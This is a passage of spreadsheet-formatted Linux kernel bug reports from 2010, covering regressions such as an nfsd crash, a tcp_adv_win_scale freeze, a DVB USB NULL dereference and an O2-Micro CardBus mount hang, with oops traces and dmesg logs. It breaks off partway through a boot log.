  <si>
    <t>Created attachment 33462 [details] acpidump output After a random uptime the thermal zone will report 0°C system temperature. The fan immediately turns off. The system will halt semiautomatically at above 110°C. This behavior was introduced between Kernel versions 2.6.31 and 2.6.32. It is persistent up to 2.6.36-rc6 and was introduced before or with commit b963bd39c9000328f6ce4f12aa52abbb0c68ee91. (I have started testing using “git bisect”, but as the time to thermal zone loss is arbitrary and can range from 5 Minutes to more than a week, I have difficulties marking any commit as good.) No dependency on other conditions could be identified so far. Trying random kernel boot flags from other problem descriptions (e.g. acpi_osi, acpi.power_nocheck, noapic and nolapic) did not improve the situation.</t>
  </si>
  <si>
    <t>nfsd crashed every 3 minutes with kernel BUG at fs/nfsd/nfsfh.h:199</t>
  </si>
  <si>
    <t>2010-10-13 13:02 UTC</t>
  </si>
  <si>
    <t>2010-10-17 19:45 UTC</t>
  </si>
  <si>
    <t>hi.. we are exporting very large (16 TB) XFS filesystems via nfs.. starting with linux-2.6.36-rc4 we keep getting the following kernel BUG messages. currently 2.6.36-rc6 is running on the server. this BUG was not triggered with linux-2.6.35.. when the BUG was triggered once it returns (exactly) every 3 Minutes.. we will try 2.6.36-rc7 in the next minutes.. regards, marius tolzmann &amp; peter marquardt ------------[ cut here ]------------ kernel BUG at fs/nfsd/nfsfh.h:199! invalid opcode: 0000 [#13] PREEMPT SMP last sysfs file: /sys/devices/pci0000:80/0000:80:0d.0/0000:8b:00.0/host5/scsi_host/host5/stats CPU 0 Modules linked in: 3w_9xxx Pid: 3841, comm: nfsd Tainted: G D 2.6.36-rc6.x86_64.51 #1 Tyan Transport VX50-B4985/CK8 RIP: 0010:[&lt;ffffffff81226172&gt;] [&lt;ffffffff81226172&gt;] nfsd3_proc_remove+0x122/0x130 RSP: 0018:ffff880434f25de0 EFLAGS: 00010246 RAX: 0000000046000000 RBX: ffff8814365d6c00 RCX: ffffc9000da920a8 RDX: ffffffff818aab00 RSI: ffffffff81220e50 RDI: ffff880432254d98 RBP: ffff880434f25e10 R08: 0000000000000001 R09: 0000000000000000 R10: 0000000000004000 R11: dead000000200200 R12: ffff8814365d6c08 R13: ffff881434760000 R14: ffff8814365da000 R15: ffff8803fe48d000 FS: 00007f7cb66586f0(0000) GS:ffff880002000000(0000) knlGS:00000000f76156c0 CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b CR2: 0000000000514c58 CR3: 0000000c3596d000 CR4: 00000000000006f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process nfsd (pid: 3841, threadinfo ffff880434f24000, task ffff880435a7b340) Stack: ffff881434760000 ffff8814365da000 ffff881434760000 ffffffff81c9d000 &lt;0&gt; ffff8803fe48d018 000000000000001c ffff880434f25e50 ffffffff81218b15 &lt;0&gt; ffffffff81c9d000 ffff881434760000 ffffffff81c9d000 ffff881435a69bc0 Call Trace: [&lt;ffffffff81218b15&gt;] nfsd_dispatch+0xb5/0x250 [&lt;ffffffff81811d26&gt;] svc_process+0x4b6/0x820 [&lt;ffffffff81219180&gt;] ? nfsd+0x0/0x160 [&lt;ffffffff8121923d&gt;] nfsd+0xbd/0x160 [&lt;ffffffff810588f6&gt;] kthread+0x96/0xa0 [&lt;ffffffff81003154&gt;] kernel_thread_helper+0x4/0x10 [&lt;ffffffff81058860&gt;] ? kthread+0x0/0xa0 [&lt;ffffffff81003150&gt;] ? kernel_thread_helper+0x0/0x10 Code: 00 00 48 89 f7 48 89 4d d8 e8 eb 55 ff ff 48 8b 4d d8 48 89 c6 44 89 e2 48 c7 c7 74 86 b0 81 31 c0 e8 1a ed 64 00 e9 0c ff ff ff &lt;0f&gt; 0b eb fe 66 2e 0f 1f 84 00 00 00 00 00 55 48 89 e5 48 83 ec RIP [&lt;ffffffff81226172&gt;] nfsd3_proc_remove+0x122/0x130 RSP &lt;ffff880434f25de0&gt; ---[ end trace 066d5aa4346b0b50 ]--- # egrep "(: Linux version|Tainted)" /var/log/messages Sep 9 10:26:47 tiaotiao kernel: Linux version 2.6.35.x86_64.48 (root@venustraphobie.molgen.mpg.de) (gcc version 4.4.2 (GCC) ) #1 SMP PREEMPT Mon Aug 2 16:35:40 CEST 2010 Sep 15 08:47:15 tiaotiao kernel: Linux version 2.6.36-rc4.x86_64.50 (root@venustraphobie.molgen.mpg.de) (gcc version 4.4.2 (GCC) ) #1 SMP PREEMPT Mon Sep 13 12:41:33 CEST 2010 Sep 24 09:25:08 tiaotiao kernel: Linux version 2.6.36-rc4.x86_64.50 (root@venustraphobie.molgen.mpg.de) (gcc version 4.4.2 (GCC) ) #1 SMP PREEMPT Mon Sep 13 12:41:33 CEST 2010 Oct 12 14:41:57 tiaotiao kernel: Pid: 3857, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 14:44:57 tiaotiao kernel: Pid: 3861, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 14:47:57 tiaotiao kernel: Pid: 3868, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 14:50:57 tiaotiao kernel: Pid: 3846, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 14:53:57 tiaotiao kernel: Pid: 3849, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 14:56:58 tiaotiao kernel: Pid: 3852, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 14:59:58 tiaotiao kernel: Pid: 3847, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 15:02:58 tiaotiao kernel: Pid: 3876, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 15:05:58 tiaotiao kernel: Pid: 3867, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 15:08:58 tiaotiao kernel: Pid: 3856, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 15:11:59 tiaotiao kernel: Pid: 3871, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 15:14:59 tiaotiao kernel: Pid: 3872, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 15:17:59 tiaotiao kernel: Pid: 3848, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 15:20:59 tiaotiao kernel: Pid: 3870, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 15:23:59 tiaotiao kernel: Pid: 3851, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 15:27:00 tiaotiao kernel: Pid: 3863, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 15:30:00 tiaotiao kernel: Pid: 3866, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 15:33:00 tiaotiao kernel: Pid: 3864, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 15:36:00 tiaotiao kernel: Pid: 3877, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 15:39:00 tiaotiao kernel: Pid: 3853, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 15:42:01 tiaotiao kernel: Pid: 3873, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 15:45:01 tiaotiao kernel: Pid: 3858, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 15:48:01 tiaotiao kernel: Pid: 3854, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 15:51:01 tiaotiao kernel: Pid: 3850, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 15:54:01 tiaotiao kernel: Pid: 3862, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 15:57:01 tiaotiao kernel: Pid: 3874, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 16:00:02 tiaotiao kernel: Pid: 3875, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 16:03:02 tiaotiao kernel: Pid: 3855, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 16:06:02 tiaotiao kernel: Pid: 3859, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 16:09:02 tiaotiao kernel: Pid: 3865, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 12 16:12:02 tiaotiao kernel: Pid: 3869, comm: nfsd Tainted: G D 2.6.36-rc4.x86_64.50 #1 Tyan Transport VX50-B4985/CK8 Oct 13 14:08:35 tiaotiao kernel: Linux version 2.6.36-rc6.x86_64.51 (root@venustraphobie.molgen.mpg.de) (gcc version 4.4.2 (GCC) ) #1 SMP PREEMPT Fri Oct 1 09:55:18 CEST 2010 Oct 13 14:11:40 tiaotiao kernel: Pid: 3854, comm: nfsd Tainted: G D 2.6.36-rc6.x86_64.51 #1 Tyan Transport VX50-B4985/CK8 Oct 13 14:14:40 tiaotiao kernel: Pid: 3851, comm: nfsd Tainted: G D 2.6.36-rc6.x86_64.51 #1 Tyan Transport VX50-B4985/CK8 Oct 13 14:17:40 tiaotiao kernel: Pid: 3855, comm: nfsd Tainted: G D 2.6.36-rc6.x86_64.51 #1 Tyan Transport VX50-B4985/CK8 Oct 13 14:20:40 tiaotiao kernel: Pid: 3850, comm: nfsd Tainted: G D 2.6.36-rc6.x86_64.51 #1 Tyan Transport VX50-B4985/CK8 Oct 13 14:23:40 tiaotiao kernel: Pid: 3856, comm: nfsd Tainted: G D 2.6.36-rc6.x86_64.51 #1 Tyan Transport VX50-B4985/CK8 Oct 13 14:26:41 tiaotiao kernel: Pid: 3853, comm: nfsd Tainted: G D 2.6.36-rc6.x86_64.51 #1 Tyan Transport VX50-B4985/CK8 Oct 13 14:29:41 tiaotiao kernel: Pid: 3849, comm: nfsd Tainted: G D 2.6.36-rc6.x86_64.51 #1 Tyan Transport VX50-B4985/CK8 Oct 13 14:32:41 tiaotiao kernel: Pid: 3846, comm: nfsd Tainted: G D 2.6.36-rc6.x86_64.51 #1 Tyan Transport VX50-B4985/CK8 Oct 13 14:35:41 tiaotiao kernel: Pid: 3847, comm: nfsd Tainted: G D 2.6.36-rc6.x86_64.51 #1 Tyan Transport VX50-B4985/CK8 Oct 13 14:38:41 tiaotiao kernel: Pid: 3840, comm: nfsd Tainted: G D 2.6.36-rc6.x86_64.51 #1 Tyan Transport VX50-B4985/CK8 Oct 13 14:41:41 tiaotiao kernel: Pid: 3839, comm: nfsd Tainted: G D 2.6.36-rc6.x86_64.51 #1 Tyan Transport VX50-B4985/CK8 Oct 13 14:44:42 tiaotiao kernel: Pid: 3841, comm: nfsd Tainted: G D 2.6.36-rc6.x86_64.51 #1 Tyan Transport VX50-B4985/CK8 Oct 13 14:47:42 tiaotiao kernel: Pid: 3838, comm: nfsd Tainted: G D 2.6.36-rc6.x86_64.51 #1 Tyan Transport VX50-B4985/CK8</t>
  </si>
  <si>
    <t>System freeze with multiples of 32 in /proc/sys/net/ipv4/tcp_adv_win_scale</t>
  </si>
  <si>
    <t>2010-10-14 14:43 UTC</t>
  </si>
  <si>
    <t>Tobias Schmidbauer</t>
  </si>
  <si>
    <t>2011-01-23 16:22 UTC</t>
  </si>
  <si>
    <t>System freezes when setting /proc/sys/net/ipv4/tcp_adv_win_scale to a multiple of 32 and causing network traffic (for example ssh, wget, firefox, etc). Does NOT happen with ping It also happens with kernel 2.6.26 (debian lenny). there is no output via dmesg, no logging about any system events in /var/log/messages or /var/log/syslog and nothing or on tty1 for example echo 32 &gt; /proc/sys/net/ipv4/tcp_adv_win_scale wget www.kernel.org I tested 16 &gt;&gt; working 32 &gt;&gt; freeze 33 &gt;&gt; working 31 &gt;&gt; working 64 &gt;&gt; freeze 65 &gt;&gt; working 96 &gt;&gt; freeze 128 &gt;&gt; freeze</t>
  </si>
  <si>
    <t>[LogFS] [2.6.36-rc7] Deadlock in logfs_get_wblocks, hold and wait on same lock super-&gt;s_write_mutex</t>
  </si>
  <si>
    <t>2010-10-14 17:56 UTC</t>
  </si>
  <si>
    <t>2010-12-24 13:44 UTC</t>
  </si>
  <si>
    <t>Subject : [LogFS] [2.6.36-rc7] Deadlock in logfs_get_wblocks, hold and wait on same lock super-&gt;s_write_mutex Submitter : Prasad Joshi &lt;prasadjoshi124@gmail.com&gt; Date : 2010-10-13 9:49 Message-ID : AANLkTinvsMxTxEbDEFmb5M-6fYjdRvErU==Zs7+qANkV@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=128696335024718&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Fwd: Re: UML kernel crash of v2.6.36-rcX kernel</t>
  </si>
  <si>
    <t>2010-10-14 18:10 UTC</t>
  </si>
  <si>
    <t>2010-12-06 22:11 UTC</t>
  </si>
  <si>
    <t>Subject : Fwd: Re: UML kernel crash of v2.6.36-rcX kernel Submitter : Toralf Förster &lt;toralf.foerster@gmx.de&gt; Date : 2010-10-13 11:28 Message-ID : 201010131328.06465.toralf.foerster@gmx.de References : http://marc.info/?l=linux-kernel&amp;m=128696930132503&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>NULL pointer dereference</t>
  </si>
  <si>
    <t>linux-2.6.35.5</t>
  </si>
  <si>
    <t>2010-10-14 19:17 UTC</t>
  </si>
  <si>
    <t>Mate Soos</t>
  </si>
  <si>
    <t>2012-05-17 15:58 UTC</t>
  </si>
  <si>
    <t>Created attachment 33652 [details] dmesg output I was running "gnome-dvb-setup", and did some strange set of actions (cancel, then forward, then cancel, etc.). It seemd to have gone haywire. Then I looked at the dmesg, and I got this: [27332.491854] BUG: unable to handle kernel NULL pointer dereference at 0000000000000012 [27332.491862] IP: [&lt;ffffffffa00cd59f&gt;] i2c_transfer+0x1a/0xc1 [i2c_core] [27332.491874] PGD 332d1067 PUD 37f20067 PMD 0 [27332.491879] Oops: 0000 [#1] SMP [27332.491882] last sysfs file: /sys/devices/pci0000:00/0000:00:1d.7/usb1/1-7/product [27332.491886] CPU 1 [27332.491887] Modules linked in: mt2060 dvb_usb_dib0700 dib7000p dib0090 dib7000m dib0070 dvb_usb dib8000 dvb_core dib3000mc dibx000_common usb_storage snd_emu10k1_synth snd_emux_synth snd_seq_virmidi snd_seq_midi_emul snd_emu10k1 snd_ac97_codec ac97_bus snd_pcm_oss snd_mixer_oss snd_pcm snd_page_alloc snd_util_mem snd_hwdep snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer snd_seq_device snd soundcore mperf cpufreq_powersave cpufreq_conservative cpufreq_userspace cpufreq_stats ppdev microcode coretemp firewire_sbp2 nouveau drm_kms_helper i5k_amb tpm_tis tpm tpm_bios parport_pc emu10k1_gp i2c_algo_bit gameport i2c_i801 rng_core ttm drm i2c_core loop uinput binfmt_misc crc16 lp parport ide_cd_mod cdrom ata_generic ata_piix usbhid hid uhci_hcd ahci libahci piix ehci_hcd tg3 firewire_ohci firewire_core ide_core crc_itu_t i5000_edac usbcore libata shpchp evdev edac_core libphy pcspkr dcdbas pci_hotplug nls_base processor button thermal thermal_sys [last unloaded: scsi_wait_scan] [27332.491958] [27332.491962] Pid: 24898, comm: gnome-dvb-daemo Not tainted 2.6.35.5 #5 0GU083/Precision WorkStation 490 [27332.491965] RIP: 0010:[&lt;ffffffffa00cd59f&gt;] [&lt;ffffffffa00cd59f&gt;] i2c_transfer+0x1a/0xc1 [i2c_core] [27332.491971] RSP: 0018:ffff880084119b88 EFLAGS: 00010286 [27332.491973] RAX: 00000000ffffffa1 RBX: 0000000000000002 RCX: 0000000000000000 [27332.491976] RDX: 0000000000000002 RSI: ffff880084119bc8 RDI: 0000000000000002 [27332.491979] RBP: 0000000000000000 R08: ffff880037c08900 R09: 0000000000000001 [27332.491981] R10: 0000000000000080 R11: ffff880120cc4400 R12: ffffc90013d3d000 [27332.491984] R13: ffff880084119bc8 R14: 0000000000000002 R15: ffffc90013e58000 [27332.491987] FS: 00007fe9b2968710(0000) GS:ffff880001a40000(0000) knlGS:0000000000000000 [27332.491990] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [27332.491992] CR2: 0000000000000012 CR3: 000000001a51f000 CR4: 00000000000006e0 [27332.491995] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [27332.491998] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [27332.492001] Process gnome-dvb-daemo (pid: 24898, threadinfo ffff880084118000, task ffff880065c46630) [27332.492003] Stack: [27332.492005] ffff880100000e00 ffffffff00000000 00000000000000eb 0000000000000000 [27332.492009] &lt;0&gt; ffffc90013d3d000 0000000000000001 ffff8800b12b20e0 ffffffffa027b109 [27332.492013] &lt;0&gt; ffff000200000010 ffff880084119bf8 0000000200010010 ffff880084119be8 [27332.492017] Call Trace: [27332.492024] [&lt;ffffffffa027b109&gt;] ? dib7000p_read_word+0x6e/0xbe [dib7000p] [27332.492029] [&lt;ffffffffa0102a93&gt;] ? usb_urb_submit+0x26/0x67 [dvb_usb] [27332.492034] [&lt;ffffffffa027bcdb&gt;] ? dib7000p_pid_filter_ctrl+0x1f/0x7b [dib7000p] [27332.492038] [&lt;ffffffffa01020ad&gt;] ? dvb_usb_ctrl_feed+0xcb/0x113 [dvb_usb] [27332.492047] [&lt;ffffffffa03be659&gt;] ? dmx_ts_feed_start_filtering+0x73/0xc9 [dvb_core] [27332.492054] [&lt;ffffffffa03bb9e5&gt;] ? dvb_dmxdev_start_feed+0xb5/0xe6 [dvb_core] [27332.492060] [&lt;ffffffffa03bcb3a&gt;] ? dvb_dmxdev_filter_start+0x2b4/0x301 [dvb_core] [27332.492067] [&lt;ffffffffa03bd2c4&gt;] ? dvb_demux_do_ioctl+0x25d/0x4a5 [dvb_core] [27332.492074] [&lt;ffffffff810ea065&gt;] ? chrdev_open+0x0/0x145 [27332.492080] [&lt;ffffffffa03bb39f&gt;] ? dvb_usercopy+0xb2/0x12e [dvb_core] [27332.492086] [&lt;ffffffffa03bd067&gt;] ? dvb_demux_do_ioctl+0x0/0x4a5 [dvb_core] [27332.492091] [&lt;ffffffff810fc06e&gt;] ? mntput_no_expire+0x23/0xde [27332.492095] [&lt;ffffffff810f27df&gt;] ? do_filp_open+0x510/0x58e [27332.492101] [&lt;ffffffffa03bc01f&gt;] ? dvb_demux_ioctl+0x38/0x5a [dvb_core] [27332.492104] [&lt;ffffffff810f351a&gt;] ? vfs_ioctl+0x23/0x93 [27332.492107] [&lt;ffffffff810f3dab&gt;] ? do_vfs_ioctl+0x45d/0x497 [27332.492111] [&lt;ffffffff810f04ef&gt;] ? getname+0x23/0x1b1 [27332.492114] [&lt;ffffffff810f3e30&gt;] ? sys_ioctl+0x4b/0x6f [27332.492119] [&lt;ffffffff810e6044&gt;] ? do_sys_open+0xea/0xf9 [27332.492125] [&lt;ffffffff810089c2&gt;] ? system_call_fastpath+0x16/0x1b [27332.492127] Code: 48 c7 c2 e3 d1 0c a0 e8 1c 5f 16 e1 48 83 c4 18 c3 41 56 41 89 d6 b8 a1 ff ff ff 41 55 49 89 f5 41 54 55 53 48 89 fb 48 83 ec 10 &lt;48&gt; 8b 57 10 48 83 3a 00 0f 84 8c 00 00 00 65 48 8b 04 25 08 cc [27332.492158] RIP [&lt;ffffffffa00cd59f&gt;] i2c_transfer+0x1a/0xc1 [i2c_core] [27332.492164] RSP &lt;ffff880084119b88&gt; [27332.492165] CR2: 0000000000000012 [27332.492185] ---[ end trace b75f99b9dc4d902c ]--- [27883.754976] usb 1-7: USB disconnect, address 7 [27883.772677] mt2060 I2C write failed The insertion of the module for my Nova-T USB stick was the following: [26964.444012] usb 1-7: new high speed USB device using ehci_hcd and address 7 [26964.576900] usb 1-7: New USB device found, idVendor=2040, idProduct=7050 [26964.576903] usb 1-7: New USB device strings: Mfr=1, Product=2, SerialNumber=3 [26964.576905] usb 1-7: Product: Nova-T Stick [26964.576908] usb 1-7: Manufacturer: Hauppauge [26964.576909] usb 1-7: SerialNumber: 4027216528 [26964.577274] dvb-usb: found a 'Hauppauge Nova-T Stick' in cold state, will try to load a firmware [26964.580510] dvb-usb: downloading firmware from file 'dvb-usb-dib0700-1.20.fw' [26964.783773] dib0700: firmware started successfully. [26965.284237] dvb-usb: found a 'Hauppauge Nova-T Stick' in warm state. [26965.284299] dvb-usb: will pass the complete MPEG2 transport stream to the software demuxer. [26965.284413] DVB: registering new adapter (Hauppauge Nova-T Stick) [26965.616534] DVB: registering adapter 0 frontend 0 (DiBcom 7000MA/MB/PA/PB/MC)... [26965.620157] MT2060: successfully identified (IF1 = 1235) [26966.098625] input: IR-receiver inside an USB DVB receiver as /devices/pci0000:00/0000:00:1d.7/usb1/1-7/input/input8 [26966.098696] dvb-usb: schedule remote query interval to 50 msecs. [26966.098699] dvb-usb: Hauppauge Nova-T Stick successfully initialized and connected. This _immediately_ preceded the above NULL pointer dereference message. The linux kernel I am using was compiled manually from sources directly from kernel.org on this machine (the same as the one that had the NULL dereference): cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 15 model name : Intel(R) Xeon(R) CPU 5130 @ 2.00GHz stepping : 6 cpu MHz : 1994.864 cache size : 4096 KB physical id : 0 siblings : 2 core id : 0 cpu cores : 2 apicid : 0 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good aperfmperf pni dtes64 monitor ds_cpl vmx tm2 ssse3 cx16 xtpr pdcm dca lahf_lm tpr_shadow bogomips : 3989.72 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical, 48 bits virtual power management: processor : 1 vendor_id : GenuineIntel cpu family : 6 model : 15 model name : Intel(R) Xeon(R) CPU 5130 @ 2.00GHz stepping : 6 cpu MHz : 1994.864 cache size : 4096 KB physical id : 0 siblings : 2 core id : 1 cpu cores : 2 apicid : 1 initial apicid : 1 fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good aperfmperf pni dtes64 monitor ds_cpl vmx tm2 ssse3 cx16 xtpr pdcm dca lahf_lm tpr_shadow bogomips : 3989.97 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical, 48 bits virtual power management: The computer is a couple-of-year old Dell Precision 490. I am running Debian squeeze, but as stated previously, I have a manually compiled and installed the kernel: uname -a Linux sleepy 2.6.35.5 #5 SMP Fri Sep 24 01:09:21 CEST 2010 x86_64 GNU/Linux I have attached the full dmesg output.</t>
  </si>
  <si>
    <t>PCMCIA D-Link (O2-Micro) USB 2.0 adapter - drives not mounting - mount freezes</t>
  </si>
  <si>
    <t>2.6.32 and higher</t>
  </si>
  <si>
    <t>2010-10-14 19:54 UTC</t>
  </si>
  <si>
    <t>David Bluecame</t>
  </si>
  <si>
    <t>2016-01-20 23:42 UTC</t>
  </si>
  <si>
    <t>Created attachment 33662 [details] HardInfo HTML report I have a laptop with USB1 only ports, so I installed a D-link PCMCIA adapter with 2xUSB2.0 ports. Everything went well until kernel 2.6.31 inclusive. When I upgraded to 2.6.32, after the upgrade I could not mount any USB2.0 drive via the PCMCIA adapter. Mount operation froze and I could not even kill the mount process. The problem happens with any USB2.0 drive, from 1.5TB external hard drive to simple USB2.0 flash drives. Upgrading to newer versions has not helped. I tried from 2.6.32.24 to 2.6.35.7 with no success, so I tried to discover what happened. After a lot of investigation, I found the problem in the drivers/pcmcia/o2micro.h file. That file was modified from version 2.6.31 to 2.6.32, adding the device number 6933 to the list of "old bridges" which should have read prefetch and write bursting disabled: (from o2micro.h) /* * older bridges have problems with both read prefetch and write * bursting depending on the combination of the chipset, bridge * and the cardbus card. so disable them to be on the safe side. */ case PCI_DEVICE_ID_O2_6729: case PCI_DEVICE_ID_O2_6730: case PCI_DEVICE_ID_O2_6812: case PCI_DEVICE_ID_O2_6832: case PCI_DEVICE_ID_O2_6836: This caused the problem ---&gt; case PCI_DEVICE_ID_O2_6933: Precisely, my device is the 6933 and it began to give me trouble when that line was added. If I remove that line and recompile the kernel, everything goes well in kernels 2.6.32.24 and 2.6.35.7, for example. From my lspci, you can see that my device is OZ6933 (6933 in the previous list): 00:13.1 CardBus bridge: O2 Micro, Inc. OZ6933/711E1 CardBus/SmartCardBus Controller (rev 01) Subsystem: Acer Incorporated [ALI] Device 1010 Flags: bus master, stepping, slow devsel, latency 168, IRQ 11 Memory at 20001000 (32-bit, non-prefetchable) [size=4K] Bus: primary=00, secondary=06, subordinate=09, sec-latency=176 Memory window 0: 18000000-1bfff000 (prefetchable) Memory window 1: 1c000000-1ffff000 I/O window 0: 00001c00-00001cff I/O window 1: 00002000-000020ff 16-bit legacy interface ports at 0001 Kernel driver in use: yenta_cardbus Kernel modules: yenta_socket I have compiled a very minimal 2.6.32.24 kernel to perform the tests with a minumin of interference from other modules. (extract from dmesg booting 2.6.32.24, at the beginning you can see how the Yenta O2 has disabled read prefetch and write burst, that's what causes the problem) yenta_cardbus 0000:00:13.0: CardBus bridge found [1025:1010] yenta_cardbus 0000:00:13.0: O2: res at 0x94/0xD4: ea/00 yenta_cardbus 0000:00:13.0: Yenta O2: old bridge, disabling read prefetch/write burst yenta_cardbus 0000:00:13.0: ISA IRQ mask 0x06b8, PCI irq 11 yenta_cardbus 0000:00:13.0: Socket status: 30000820 yenta_cardbus 0000:00:13.1: CardBus bridge found [1025:1010] yenta_cardbus 0000:00:13.1: ISA IRQ mask 0x06b8, PCI irq 11 yenta_cardbus 0000:00:13.1: Socket status: 30000006 pcmcia_socket pcmcia_socket0: pccard: CardBus card inserted into slot 0 pci 0000:02:00.0: reg 10 32bit mmio: [0x000000-0x000fff] pci 0000:02:00.0: supports D1 D2 pci 0000:02:00.0: PME# supported from D0 D1 D2 D3hot pci 0000:02:00.0: PME# disabled pci 0000:02:00.1: reg 10 32bit mmio: [0x000000-0x000fff] pci 0000:02:00.1: supports D1 D2 pci 0000:02:00.1: PME# supported from D0 D1 D2 D3hot pci 0000:02:00.1: PME# disabled pci 0000:02:00.2: reg 10 32bit mmio: [0x000000-0x0000ff] pci 0000:02:00.2: supports D1 D2 pci 0000:02:00.2: PME# supported from D0 D1 D2 D3hot pci 0000:02:00.2: PME# disabled SCSI subsystem initialized usbcore: registered new interface driver usbfs usbcore: registered new interface driver hub usbcore: registered new device driver usb Initializing USB Mass Storage driver... usbcore: registered new interface driver usb-storage USB Mass Storage support registered. ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver ehci_hcd: block sizes: qh 60 qtd 96 itd 160 sitd 96 ehci_hcd 0000:02:00.2: enabling device (0000 -&gt; 0002) ehci_hcd 0000:02:00.2: EHCI Host Controller drivers/usb/core/inode.c: creating file 'devices' drivers/usb/core/inode.c: creating file '001' ehci_hcd 0000:02:00.2: new USB bus registered, assigned bus number 1 ehci_hcd 0000:02:00.2: reset hcs_params 0x2395 dbg=0 cc=2 pcc=3 ports=5 ehci_hcd 0000:02:00.2: reset portroute 1 0 1 0 0 ehci_hcd 0000:02:00.2: reset hcc_params e806 thresh 0 uframes 256/512/1024 park ehci_hcd 0000:02:00.2: park 0 ehci_hcd 0000:02:00.2: reset command 080b02 park=3 ithresh=8 period=1024 Reset HALT ehci_hcd 0000:02:00.2: Enabling legacy PCI PM ehci_hcd 0000:02:00.2: ...powerup ports... ehci_hcd 0000:02:00.2: MWI active ehci_hcd 0000:02:00.2: irq 11, io mem 0x14002000 ehci_hcd 0000:02:00.2: reset command 080b02 park=3 ithresh=8 period=1024 Reset HALT ehci_hcd 0000:02:00.2: init command 010009 (park)=0 ithresh=1 period=256 RUN ehci_hcd 0000:02:00.2: USB 2.0 started, EHCI 1.00 usb usb1: default language 0x0409 usb usb1: udev 1, busnum 1, minor = 0 usb usb1: New USB device found, idVendor=1d6b, idProduct=0002 usb usb1: New USB device strings: Mfr=3, Product=2, SerialNumber=1 usb usb1: Product: EHCI Host Controller usb usb1: Manufacturer: Linux 2.6.32.24-PRUEBAS 